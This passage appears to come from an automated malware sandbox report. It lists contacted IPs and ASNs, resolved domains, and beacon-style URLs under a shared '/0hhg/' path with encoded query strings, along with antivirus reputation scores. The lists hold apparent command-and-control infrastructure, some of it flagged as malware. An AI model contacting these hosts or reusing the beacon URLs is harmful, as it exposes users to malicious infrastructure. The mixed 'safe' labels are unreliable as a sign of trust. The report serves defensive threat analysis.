36454 CNSV-LLCUS false
91.195.240.19
 parkingpage.namecheap.com Germany
47846 SEDO-ASDE false
194.58.112.173
 www.bettaroom.ru Russian Federation
197695 AS-REGRU false
216.40.34.41
 www.whirledairlines.com Canada
15348 TUCOWSCA false

Contacted Domains

Name IP Active
vavada-band.ru 148.251.36.121 true
cucuzeus88.store 153.92.8.41 true
www.quantummquest.top 203.161.50.127 true
www.dhleba51.ru 195.24.68.5 true
applesolve.com 188.116.38.155 true
parkingpage.namecheap.com 91.195.240.19 true
www.bettaroom.ru 194.58.112.173 true
bnbuotqakx.shop 101.99.93.157 true
www.xxaiai.top 108.186.8.158 true
dainikmirpur.com 192.250.235.36 true
www.whirledairlines.com 216.40.34.41 true
yamiyasheec.online 119.18.54.116 true
www.applesolve.com unknown unknown
www.cucuzeus88.store unknown unknown
www.bnbuotqakx.shop unknown unknown
www.dainikmirpur.com unknown unknown
www.dk48.lol unknown unknown
www.cluird.cloud unknown unknown
www.yamiyasheec.online unknown unknown
www.vavada-band.ru unknown unknown
www.vaesen.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.whirledairlines.com/0hhg/ false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.yamiyasheec.online/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg= false
  • Avira URL Cloud: safe
 unknown
http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM= false
  • Avira URL Cloud: malware
 unknown
http://www.applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ false
  • Avira URL Cloud: safe
 unknown
http://www.applesolve.com/0hhg/ false
  • 2%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.dk48.lol/0hhg/ false
  • Avira URL Cloud: safe
 unknown
http://www.dk48.lol/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc= false
  • Avira URL Cloud: safe
 unknown
http://www.xxaiai.top/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo= false
  • Avira URL Cloud: safe
 unknown
http://www.bnbuotqakx.shop/0hhg/ false
  • Avira URL Cloud: malware
 unknown
http://www.whirledairlines.com/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4= false
  • Avira URL Cloud: safe
 unknown
http://www.quantummquest.top/0hhg/ false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.quantummquest.top/0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ false
  • Avira URL Cloud: safe
 unknown
http://www.dainikmirpur.com/0hhg/ false
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.yamiyasheec.online/0hhg/ false
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.dhleba51.ru/0hhg/ false
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://www.xxaiai.top/0hhg/ false
  • Avira URL Cloud: safe
 unknown
http://www.dainikmirpur.com/0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ false
  • Avira URL Cloud: safe
 unknown
http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40= false
  • Avira URL Cloud: malware
 unknown
http://www.bettaroom.ru/0hhg/ false
  • 8%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://www.cucuzeus88.store/0hhg/ false
  • Avira URL Cloud: safe
 unknown